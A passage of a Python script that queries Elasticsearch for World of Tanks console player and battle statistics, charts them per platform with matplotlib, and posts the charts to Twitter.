{"from": 5, "to": 10},
{"from": 10, "to": 20},
{"from": 20, "to": 30},
{"from": 30, "to": 40},
{"from": 40, "to": 50},
{"from": 50}
],
'watermark text': '@WOTC_Tracker',
'wg api key': 'DEMO'
}
)
def query_es_for_graphs(config):
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['gte'] = then.strftime('%Y-%m-%d')
new_players_query['query']['bool'][
'must'][-1]['range']['created_at']['lt'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
battles = es.search(index=config['battle index'], body=battles_query)
players = es.search(index=config['battle index'], body=players_query)
newplayers = es.search(index='players', body=new_players_query)
# Filter numbers
battles_xbox = []
battles_ps = []
players_xbox = []
players_ps = []
newplayers_xbox = []
newplayers_ps = []
averages_xbox = []
averages_ps = []
for bucket in battles['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
battles_xbox.append(0)
battles_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
battles_xbox.append(subbucket['1']['value'])
else:
battles_ps.append(subbucket['1']['value'])
for bucket in players['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
players_xbox.append(0)
players_ps.append(0)
continue
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
players_xbox.append(subbucket['doc_count'])
else:
players_ps.append(subbucket['doc_count'])
for bucket in newplayers['aggregations']['2']['buckets']:
if not bucket['3']['buckets']:
newplayers_xbox.append(0)
newplayers_ps.append(0)
for subbucket in bucket['3']['buckets']:
if subbucket['key'] == 'xbox':
newplayers_xbox.append(subbucket['doc_count'])
else:
newplayers_ps.append(subbucket['doc_count'])
for b, p in zip(battles_xbox, players_xbox):
averages_xbox.append(b / p)
for b, p in zip(battles_ps, players_ps):
averages_ps.append(b / p)
dates = [b['key_as_string'].split('T')[0] for b in players[
'aggregations']['2']['buckets']]
newplayers_dates = [b['key_as_string'].split('T')[0] for b in newplayers[
'aggregations']['2']['buckets']]
return dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps
def query_es_for_unique(config):
now = datetime.utcnow()
es = Elasticsearch(**config['elasticsearch'])
unique = {'Xbox': [], 'Playstation': []}
unique_count_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
for earliest in config['unique']:
unique_count_query['query']['bool']['must'][-1]['range']['date'][
'gte'] = (now - timedelta(days=earliest)).strftime('%Y-%m-%d')
results = es.search(index=config['battle index'], body=unique_count_query)
for bucket in results['aggregations']['2']['buckets']:
if bucket['key'] == 'xbox':
unique['Xbox'].append(bucket['1']['value'])
else:
unique['Playstation'].append(bucket['1']['value'])
return unique
def create_activity_graphs(dates, battles_xbox, battles_ps, players_xbox, players_ps, newplayers_dates, newplayers_xbox, newplayers_ps, averages_xbox, averages_ps, watermark_text='@WOTC_Tracker'):
shifted_dates = [(datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d') for d in dates]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform')
# ax1 = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, players_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, players_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(PLAYERS_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Total Battles Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, battles_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, battles_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLES_PNG)
del fig
# New Players PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('New Accounts Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(dates, ha='right')
ax1.plot(newplayers_dates, newplayers_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(newplayers_dates, newplayers_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(NEWPLAYERS_PNG)
del fig
# Averages PNG
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform')
# ax = plt.axes()
ax1 = fig.add_subplot(111)
ax1.tick_params(axis='x', labelrotation=45)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.set_xticklabels(shifted_dates, ha='right')
ax1.plot(shifted_dates, averages_xbox, color='green', linewidth=2, label='Xbox')
ax1.plot(shifted_dates, averages_ps, color='blue', linewidth=2, label='Playstation')
ax1.grid()
ax1.legend()
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(AVERAGE_PNG)
del fig
def query_es_for_active_accounts(config):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
personal_players_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
personal_players_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Get all account IDs of active players
hits = []
response = es.search(index=config['battle index'], body=personal_players_query, scroll='30s')
while len(response['hits']['hits']):
hits.extend(response['hits']['hits'])
response = es.scroll(scroll_id=response['_scroll_id'], scroll='3s')
flattened = [doc['_source']['account_id'] for doc in hits]
# Query account information to get age details
player_info_extracted = []
for i in range(0, len(flattened), 10000):
active_player_info = es.mget(index='players', doc_type='player', body={'ids': flattened[i:i+10000]}, _source=['account_id', 'console', 'created_at'])
player_info_extracted.extend([doc['_source'] for doc in active_player_info['docs']])
sorted_player_info = sorted(player_info_extracted, key = lambda d: d['created_at'])
buckets = {
"xbox": OrderedDict((v, 0) for v in sorted(config['account age'])),
"ps": OrderedDict((v, 0) for v in sorted(config['account age'])),
"all": OrderedDict((v, 0) for v in sorted(config['account age']))
}
# Sum account ages based on range of age
buckets['xbox']['other'] = 0
buckets['ps']['other'] = 0
buckets['all']['other'] = 0
for player in sorted_player_info:
delta = now - datetime.strptime(player['created_at'], '%Y-%m-%dT%H:%M:%S')
for key in buckets['all'].keys():
if not isinstance(key, int):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
elif delta.total_seconds() <= (key * 24 * 60 * 60):
buckets['all'][key] += 1
buckets[player['console']][key] += 1
break
return buckets
def calc_label(value):
if value < 7:
return '{} day{}'.format(value, '' if value == 1 else 's')
elif 7 <= value < 30:
return '{} week{}'.format(value // 7, '' if value // 7 == 1 else 's')
elif 30 <= value < 365:
return '{} month{}'.format(value // 30, '' if value // 30 == 1 else 's')
else:
return '{} year{}'.format(value // 365, '' if value // 365 == 1 else 's')
def calc_angle(wedge):
return (wedge.theta2 - wedge.theta1) / 2 + wedge.theta1
def create_account_age_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of active accounts by account age for {}".format(then.strftime('%Y-%m-%d')))
ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
if not isinstance(key, int):
outer_labels.append('>' + calc_label(prev))
else:
outer_labels.append('{} - {}'.format(calc_label(prev), calc_label(key)))
prev = key
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
# Add subplot in second row, below nested pie chart
ax2 = plt.subplot2grid((11, 1), (10, 0))
ax2.axhline(color='black', y=0)
# Xbox, Playstation
totals = [sum(buckets['xbox'].values()), sum(buckets['ps'].values()), sum(buckets['all'].values())]
ypos = -0.18
bottom = 0
height = 0.1
for i in range(len(totals) - 1):
width = totals[i] / totals[-1]
ax2.barh(ypos, width, height, left=bottom, color=inner_colors[i])
xpos = bottom + ax2.patches[i].get_width() / 2
bottom += width
ax2.text(xpos, ypos, '{} ({:.1f}%)'.format(totals[i], (totals[i] / totals[-1]) * 100), ha='center', va='center')
ax2.axis('off')
ax2.set_title('Total Active Players', y=0.325)
ax2.set_xlim(0, 1)
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(ACCOUNTAGE_PNG)
del fig
def query_es_for_accounts_by_battles(config):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['gt'] = then.strftime('%Y-%m-%d')
accounts_per_battles_range_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
if 'battle ranges' in config:
accounts_per_battles_range_query['aggs']['2']['range']['ranges'] = config['battle ranges']
response = es.search(index=config['battle index'], body=accounts_per_battles_range_query)
buckets = {
"xbox": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"ps": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
"all": OrderedDict((v, 0) for v in response['aggregations']['2']['buckets'].keys()),
}
for key, value in response['aggregations']['2']['buckets'].items():
buckets['all'][key] = value['doc_count']
for bucket in value['3']['buckets']:
buckets[bucket['key']][key] = bucket['doc_count']
return buckets
def create_accounts_by_battles_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
then = datetime.utcnow() - timedelta(days=1)
fig.suptitle("Breakdown of accounts by number of battles played for {}".format(then.strftime('%Y-%m-%d')))
# ax1 = plt.subplot2grid((11, 1), (0, 0), rowspan=10)
ax1 = plt.axes()
ax1.axis('equal')
size = 0.125
outer_labels = []
prev = 0
for key in buckets['all'].keys():
parts = key.split('-')
outer_labels.append('{}-{} battles'.format(int(float(parts[0])) if parts[0] != '*' else parts[0], int(float(parts[1])) - 1 if parts[1] != '*' else parts[1]))
# Outer pie chart
outer_cmap = plt.get_cmap("binary")
outer_colors = outer_cmap([i * 10 for i in range(10, len(buckets['all'].keys()) + 11)])
outer_wedges, outer_text, outer_autotext = ax1.pie(
buckets['all'].values(),
explode=[0.1 for __ in outer_labels],
radius=1,
colors=outer_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='%1.1f%%',
pctdistance=1.1
#labels=outer_labels
)
bbox_props = dict(boxstyle='square,pad=0.3', fc='w', ec='k', lw=0.72)
kw = dict(arrowprops=dict(arrowstyle='-'), bbox=bbox_props, zorder=0, va='center')
for i, wedge in enumerate(outer_wedges):
angle = calc_angle(wedge)
y = sin(angle * (pi / 180))
x = cos(angle * (pi / 180))
align = 'right' if x < 0 else 'left'
connectionstyle = 'angle,angleA=0,angleB={}'.format(angle)
kw['arrowprops'].update({'connectionstyle': connectionstyle})
ax1.annotate(
outer_labels[i],
xy=(x, y),
xytext=(1.35*(-1 if x < 0 else 1), 1.4*y),
horizontalalignment=align,
**kw
)
# Inner pie chart
inner_cmap = plt.get_cmap("tab20c")
pie_flat = list(zip(buckets['xbox'].values(), buckets['ps'].values()))
inner_labels = []
for pair in pie_flat:
inner_labels.extend(['xbox', 'ps'])
inner_colors = inner_cmap([1 if console == 'ps' else 9 for console in inner_labels])
inner_wedges, inner_text, inner_autotext = ax1.pie(
[item for sublist in pie_flat for item in sublist],
explode=[0.1 for __ in inner_labels],
radius=1.05-size,
colors=inner_colors,
wedgeprops=dict(width=size, edgecolor='w'),
autopct='',
pctdistance=0.9
)
# Replace inner text with actual values
for i, label, wedge, text in zip(range(len(inner_wedges)), inner_labels, inner_wedges, inner_autotext):
text.set_text(buckets[label]['other' if i // 2 > len(buckets['all'].keys()) - 1 else list(buckets['all'].keys())[i // 2]])
angle = calc_angle(wedge)
if 90 < angle < 270:
angle += 180
text.set_rotation(angle)
# Patch inner wedges to group together in explosion
# Influenced by: https://stackoverflow.com/a/20556088/1993468
groups = [[i, i+1] for i in range(0, len(inner_wedges), 2)]
radfraction = 0.1
for group in groups:
angle = ((inner_wedges[group[-1]].theta2 + inner_wedges[group[0]].theta1)/2) * (pi / 180)
for g in group:
wedge = inner_wedges[g]
wedge.set_center((radfraction * wedge.r * cos(angle), radfraction * wedge.r * sin(angle)))
ax1.legend(inner_wedges[-2:], ['xbox', 'ps'], loc='lower right')
fig.text(0.5, 0.5, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(BATTLERANGE_PNG)
del fig
def query_five_battles_a_day_minimum(config):
now = datetime.utcnow()
then = now - timedelta(days=config['days'])
es = Elasticsearch(**config['elasticsearch'])
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
five_battles_a_day_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
response = es.search(index=config['battle index'], body=five_battles_a_day_query)
buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in response['aggregations']['4']['buckets']:
key = bucket['key_as_string'].split('T')[0]
buckets['xbox'][key] = 0
buckets['ps'][key] = 0
buckets['all'][key] = 0
for subbucket in bucket['3']['buckets']:
buckets[subbucket['key']][key] = subbucket['2']['buckets']['5.0-*']['doc_count']
buckets['all'][key] = buckets['xbox'][key] + buckets['ps'][key]
return buckets
# Requested by Khorne Dog in the forums
def create_five_battles_minimum_chart(buckets, watermark_text='@WOTC_Tracker'):
plt.clf()
fig = plt.figure(figsize=(11, 8), dpi=150)
fig.suptitle("Number of accounts having played at least 5 battles")
ax1 = fig.add_subplot(111)
width = 0.25
keys = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in buckets['all'].keys()]
xkeys = [d - timedelta(hours=3) for d in keys]
pkeys = [d + timedelta(hours=3) for d in keys]
xbox_bars = ax1.bar(xkeys, buckets['xbox'].values(), width=width, color='g')
ps_bars = ax1.bar(pkeys, buckets['ps'].values(), width=width, color='b')
ax1.table(
cellText=[
list(buckets['xbox'].values()),
list(buckets['ps'].values()),
list(buckets['all'].values())],
rowLabels=['xbox', 'ps', 'all'],
colLabels=[d.strftime('%Y-%m-%d') for d in keys],
loc='bottom')
ax1.set_ylabel('Accounts')
ax1.set_xticks([])
ax1.legend((xbox_bars[0], ps_bars[0]), ('xbox', 'ps'))
ax1.text(0.5, 1.05, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
fig.savefig(FIVEADAY_PNG)
def query_long_term_data(config, filter_server_failures=True):
now = datetime.utcnow()
then = now - timedelta(days=config.get('long term', 90) + 1)
es = Elasticsearch(**config['elasticsearch'])
# Setup queries
battles_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
players_query['query']['bool'][
'must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
players = es.search(index=config['battle index'], body=players_query)
battles = es.search(index=config['battle index'], body=battles_query)
players_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
battles_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
average_battles_per_day_buckets = {
"xbox": OrderedDict(),
"ps": OrderedDict(),
"all": OrderedDict()
}
for bucket in players['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
players_buckets['xbox'][key] = 0
players_buckets['ps'][key] = 0
players_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
players_buckets[subbucket['key']][key] = subbucket['doc_count']
players_buckets['all'][key] = players_buckets['xbox'][key] + players_buckets['ps'][key]
for bucket in battles['aggregations']['2']['buckets']:
key = bucket['key_as_string'].split('T')[0]
battles_buckets['xbox'][key] = 0
battles_buckets['ps'][key] = 0
battles_buckets['all'][key] = 0
if not bucket['3']['buckets']:
continue
for subbucket in bucket['3']['buckets']:
battles_buckets[subbucket['key']][key] = subbucket['1']['value']
battles_buckets['all'][key] = battles_buckets['xbox'][key] + battles_buckets['ps'][key]
if filter_server_failures:
skip_next = False
for key, value in players_buckets['ps'].items():
# 20,000 is way below normal. Sometimes the server dies partway through. This day should be skipped
if value < 20000:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = True
elif skip_next:
players_buckets['xbox'][key] = None
players_buckets['ps'][key] = None
players_buckets['all'][key] = None
battles_buckets['xbox'][key] = None
battles_buckets['ps'][key] = None
battles_buckets['all'][key] = None
skip_next = False
for key in players_buckets['all'].keys():
if players_buckets['xbox'][key] is None:
average_battles_per_day_buckets['all'][key] = None
average_battles_per_day_buckets['xbox'][key] = None
average_battles_per_day_buckets['ps'][key] = None
else:
average_battles_per_day_buckets['xbox'][key] = battles_buckets['xbox'][key] / players_buckets['xbox'][key]
average_battles_per_day_buckets['ps'][key] = battles_buckets['ps'][key] / players_buckets['ps'][key]
average_battles_per_day_buckets['all'][key] = (battles_buckets['xbox'][key] + battles_buckets['ps'][key]) / (players_buckets['xbox'][key] + players_buckets['ps'][key])
delkey = list(players_buckets['all'].keys())[0]
# delkey = list(battles_buckets['all'].keys())[0]
del players_buckets['all'][key]
del players_buckets['xbox'][key]
del players_buckets['ps'][key]
del battles_buckets['all'][key]
del battles_buckets['xbox'][key]
del battles_buckets['ps'][key]
del average_battles_per_day_buckets['xbox'][key]
del average_battles_per_day_buckets['ps'][key]
del average_battles_per_day_buckets['all'][key]
return players_buckets, battles_buckets, average_battles_per_day_buckets
def create_long_term_charts(players_buckets, battles_buckets, average_battles_per_day_buckets, watermark_text='@WOTC_Tracker'):
dates = [datetime.strptime(d, '%Y-%m-%d') - timedelta(days=1) for d in players_buckets['all'].keys()]
# Players PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Active Accounts Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, players_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, players_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(PLAYERSLONG_PNG)
del fig
# Battles PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Total Battles Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, battles_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, battles_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(BATTLESLONG_PNG)
del fig
# Average PNG
plt.clf()
fig = plt.figure(figsize=(24, 8), dpi=150)
fig.suptitle('Average Battles Played Per Account Per Platform (long view)')
ax1 = fig.add_subplot(111)
ax1.ticklabel_format(useOffset=False, style='plain')
ax1.plot(dates, average_battles_per_day_buckets['xbox'].values(), color='green', linewidth=2, label='Xbox')
ax1.plot(dates, average_battles_per_day_buckets['ps'].values(), color='blue', linewidth=2, label='Playstation')
ax1.set_xticks(dates)
ax1.grid()
ax1.legend()
ax1.text(0.5, -0.15, watermark_text, horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
fig.tight_layout()
fig.autofmt_xdate()
# ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
fig.savefig(AVERAGELONG_PNG)
del fig
def upload_long_term_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
playerslong = api.media_upload(PLAYERSLONG_PNG)
battleslong = api.media_upload(BATTLESLONG_PNG)
averagelong = api.media_upload(AVERAGELONG_PNG)
api.update_status(
status='Long-term view of active accounts, with downtime and multi-day catchup errors omitted',
media_ids=[playerslong.media_id, battleslong.media_id, averagelong.media_id]
)
def upload_long_term_mode_charts(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
modelong = api.media_upload(MODEBREAKDOWNLONG_PNG)
percentlong = api.media_upload(MODEBREAKDOWNPERCENTLONG_PNG)
api.update_status(
status='Long-term view of battles per mode',
media_ids=[modelong.media_id, percentlong.media_id]
)
def upload_activity_graphs_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battles = api.media_upload(BATTLES_PNG)
players = api.media_upload(PLAYERS_PNG)
newplayers = api.media_upload(NEWPLAYERS_PNG)
averages = api.media_upload(AVERAGE_PNG)
api.update_status(
status=config['twitter']['message'],
media_ids=[players.media_id, battles.media_id, newplayers.media_id, averages.media_id]
)
def upload_account_age_graph_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
accountage = api.media_upload(ACCOUNTAGE_PNG)
api.update_status(
status='Breakdown of active accounts by age per platform on #worldoftanksconsole',
media_ids=[accountage.media_id]
)
def upload_accounts_by_battles_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
battlerange = api.media_upload(BATTLERANGE_PNG)
api.update_status(
status='Breakdown of accounts by number of battles played on #worldoftanksconsole',
media_ids=[battlerange.media_id]
)
def upload_five_battles_minimum_chart_to_twitter(config):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
fiveaday = api.media_upload(FIVEADAY_PNG)
api.update_status(
status='Filtering accounts per day with 5 battles minimum on #worldoftanksconsole',
media_ids=[fiveaday.media_id]
)
def share_unique_with_twitter(config, unique):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
status = 'Unique Active Accounts For {} Over Time\n{}'
formatting = '{} days: {}'
for key, values in unique.items():
api.update_status(
status=status.format(
key,
'\n'.join(map(lambda l: formatting.format(
config['unique'][values.index(l)], l), values))
)
)
def build_cw_tanks_list(config):
api = 'https://api-console.worldoftanks.com/wotx/encyclopedia/vehicles/'
params = {
'application_id': config['wg api key'],
'fields': 'era,tank_id'
}
data = get(api, params=params).json()['data']
return ' OR '.join(
list(
map(
lambda t: 'tank_id:{}'.format(t['tank_id']),
filter(lambda t: t['era'] != '', data.values())
)
)
)
def query_es_for_top_tanks(config, era):
now = datetime.utcnow()
then = now - timedelta(days=1)
es = Elasticsearch(**config['elasticsearch'])
if era == 'ww2':
query = ww2_popular_tanks_query
elif era == 'cw':
query = cw_popular_tanks_query
# Setup query
query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
response = es.search(index=config['tank index'], body=query)
buckets = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for bucket in response['aggregations']['2']['buckets']:
for subbucket in bucket['4']['buckets']:
key = subbucket['key']
for tank in subbucket['3']['buckets']:
buckets[key][tank['key']] = int(tank['1']['value'])
return buckets
def query_for_tank_info(tanks):
url = 'https://wotconsole.ru/api/tankopedia/en/{}.json'
new_tanks = {
'xbox': OrderedDict(),
'ps': OrderedDict()
}
for plat, t in tanks.items():
for tank, battles in t.items():
response = get(url.format(tank))
new_tanks[plat][response.json()['info']['user_string']] = battles
new_tanks['playstation'] = new_tanks['ps']
del new_tanks['ps']
return new_tanks
def share_top_tanks(config, era, top, day):
auth = OAuthHandler(
config['twitter']['api key'],
config['twitter']['api secret key'])
auth.set_access_token(
config['twitter']['access token'],
config['twitter']['access token secret'])
api = API(auth)
for platform, tanks in top.items():
status = "Most used {} tanks on {} for {}\n{}"
formatting = '{}: {} battles'
api.update_status(
status=status.format(
era,
platform.capitalize(),
day,
'\n'.join([formatting.format(tank, battles) for tank, battles in tanks.items()])
)
)
def query_es_for_mode_battles_difference(config, long_term=False):
now = datetime.utcnow()
then = now - timedelta(days=config['days'] if not long_term else config['long term'])
es = Elasticsearch(**config['elasticsearch'])
# Setup query
battles_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
battles_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['gte'] = then.strftime('%Y-%m-%d')
cw_popular_tanks_query['query']['bool']['must'][-1]['range']['date']['lte'] = now.strftime('%Y-%m-%d')
# Query Elasticsearch
total_battles_response = es.search(index=config['battle index'], body=battles_query)
cw_battles_response = es.search(index=config['tank index'], body=cw_popular_tanks_query)
dates = [b['key_as_string'].split('T')[0] for b in total_battles_response[
'aggregations']['2']['buckets']]
# Filter numbers
ww2_battles_xbox = OrderedDict()
ww2_battles_ps = OrderedDict()
